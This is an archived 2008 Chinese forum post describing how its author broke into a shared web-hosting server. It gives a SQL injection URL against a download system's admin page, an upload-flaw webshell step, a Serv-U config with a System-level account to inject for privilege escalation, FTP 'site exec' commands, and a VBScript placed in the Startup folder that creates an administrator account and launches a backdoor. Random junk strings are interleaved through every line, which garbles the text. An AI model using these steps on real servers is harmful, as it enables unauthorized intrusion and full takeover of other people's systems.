我爱电脑技术论坛's Archiver

tianshiren 发表于 2008-6-26 18:07

记一次渗透虚拟主机服务器

几天听一树说了惊云下载系统的漏洞  
bgp2l3M1F7Vx)Tz 问题文件出在admin/user.asp  
.j ?_| P{mg 提交  S\2_2M\dO#Ei,p
[url]http://www.xxx.com/down/admin/user.asp?user=admin[/url]’ and asc(mid(pwd,1,1))>37 and ’1’=’1  5?Kk1G{2D7v8@%c
就相当于:  
makU|/j9Pg select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’"  !^8c6p/[5l_V)O1_
-R3Dg[%ND Ue v!a
利用access注入得到管理员密码  cDR0SG b*?Z
上面有一个文件upfile.htm  
'{ di[^ y2Q | 手工利用了下动网的upfile.asp漏洞  
t s_Y n(@Z.[(ef 就成功上传了个asp木马  $b}_-u({2K Ab
然后那个虚拟主机的c,d盘是NTFS分区  \*HN#LK'T|L;YB0D
不能访问E盘装着servu,php,webmail,  :\8K*OT+Iqb^/o
F盘是虚拟站点  {S5d.z b d1~
servu安装目录可写~  
7`B4~6~h+QWr] O 本来打算替换他servu文件的~但是觉的太麻烦  
0W+_"db*KL w%a A 还容易让管理员怀疑  
+\(C_IK'sMl,G 想起servu的本地提升来了  
t5?%q.Z u5_ Z1i "P ^S(HsP*p)x [_
在自己计算机上装了个servu  
z9@ {$G%x x:q 添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限  
)PJYmf3o,w 然后去servu安装目录里看ServUDaemon.ini  
$w0W{(A0?ht(YC0~ 格式是这样的  w8Zf b^+Fz{&|
[GLOBAL]  
o&J-Kut Version=5.0.0.11  
$|^R[m1@/fY0Vq LocalSetupPassword=072C63105200180D5C07170A7E3E  Tl-]s2n Te
LocalSetupPortNo=60628  |+q ZE.A wir8ho
ProcessID=972  $o!M}dk,d@
[DOMAINS]  
!U%o7im[8uS Domain1=192.168.0.102||21|向导产生域|1|0|0  )uT)?e MZ g;P
Domain2=192.168.0.102||2121|123|2|0|0  
~Y gZ*h|4gT [Domain1]  
:ak#~J g'J-v User1=www|1|0  %F'a5i Rb6m
[USER=www|1]  /o)VT:Z;k+u }
Password=ih0C292E1AC82920B7F384007F302A1296  
G@.\ Qf[-\ HomeDir=D:\xiaoben  tpTOZU2dj
TimeOut=600  *eb'O(EN5z9Q6U
Note1="Wizard generated account"  )f8G\ t {:f)U&d&o
Access1=D:\xiaoben|RLPWAMCD  
*^&V:_Qo7vhe SKEYValues=  S(Uj!g:w
[Domain2]  
K4k0[*L ]K User1=rover|1|0  
a&~-U(rz$S:m6x User2=123|1|0  
$f+w fB)I5~|2e [USER=rover|2]  $PS;U7x%a9~'H
Password=dx5D12C060F16C7166779414FA038E881D  PY~-^$k"}rm`h"E%VO
HomeDir=c:\  
%vc;Z#wXVh5Db!m TimeOut=600  
? o@[9T Maintenance=System  
6_,p5F:O8hW"R)|9F Access1=C:\|RWAMELCDP  Ke,^9Z8n'[!|
SKEYValues=  
MW(B*rD%Qv$P6i [USER=123|2]  `G`z,C!wJ
Password=kv3F6EED70340AD1478ADF95963A07FD00  'w^B6P$h&}
HomeDir=c:\  
f9W^M+^L TimeOut=600  
-Hp&A8x*a4q%i Access1=C:\|RWAMLCDP  
Gc5P^U SKEYValues=  
dSE ZcZ)M ----------------  ?[f/[9pKx
其中rover用户就是我添加的那个  
C{3]qc 在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini  
/A7CGc],iZ4H~*g"W 访照我本地的INI写进一个用户进去  'c^%a"xbDb
User1=rover|1|0  
\x Bo8N:{] [USER=rover|2]  
K\'E$O(}{ Password=dx5D12C060F16C7166779414FA038E881D  
#HOYIqKA0D HomeDir=c:\  JLU!Oel9DX
TimeOut=600  1_,p H'?O7q
Maintenance=System  
}:e)D*K"mBv6i8p Access1=C:\|RWAMELCDP  f/M6qA1D9M"v&E;dY
SKEYValues=  
Jr~4_A7\h \c$v*zDP 保存~  
B!|E#A9E 2F9GfrzPwP
用我新建的用户和密码连接~  Ocl&x&bzp:M
好的,还是连上了  
*R@4n_| ftp  Rh:q o6AN` B#ln
ftp>open ip   
3e*N3{r)mL Connected to ip.  
#@2Fo%~`"e 220 Serv-U FTP Server v5.0.0.4 for WinSock ready...  
$sT2G7gzS User (ip:(none)): id //输入构造的用户  
(|/h)O gwgzL 331 User name okay, please send complete E-mail address as password.  
#GU$p }n-rX Password:password //密码  
^C8Q8Bs&a 230 User logged in, proceed.  'B_ a G/EQ%t4s K C7s
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。  
9z9|,B%u;W,gA 250 Directory changed to /WINNT  
J6Zl7j6w!diF ftp>cd system32 //进入system32目录  &]cO#E!m&O
250 Directory changed to /WINNT/system32  )xqJ Q%wdRJ\
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。  .J0z4[[;K]
提示没有权限~郁闷~  ic-f4V k#Ug
但是我们有对C盘的访问权限了是不~hoho~   }_8~5_sN5F
把后门(server.exe)传他system32目录  
SO-E;F"z(t"i 然后写一个VBs教本  4T1x H6V4oC}uB9n!fpF
set wshshell=createobject ("wscript.shell")   \1G!N(sXNl.p-}
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)   
NQC A]W b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)  "Et(i{ e ^ w
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)  
U`0L3{6~ b=wshshell.run ("cmd.exe /c server.exe",0)  
uCV4I_ Ct r$w
,@5uh8D?5I0|.C To 存为HELP.vbe  *fm x-x;q.C
这个教本的作用是修改tsinternetuser用户密码为rover1234  
}!B ].M E vIh6C 并且提升为管理员   ]*iu4MZUIx
然后执行system32目录下的server.exe  
v_`!@TJ aL 把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动  
@@o,}scn:V 目录  /RCV.~Cf
这样管理员只要一登陆就会执行那个教本~  $y C;d$C8tq9r"|
接下来就是等了~  
#[ iv?CEyI;i 等他登陆~  W/eWr9o Jd)\v
等了一段时间(看了一部蜘蛛侠的时间吧)~  
1mAu-t9U9i9s:p 连接后门~得到admin权限的shell  .AT waU!Zv
hoho~  
YO As {4P 接下来是善后工作了~就不说了

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.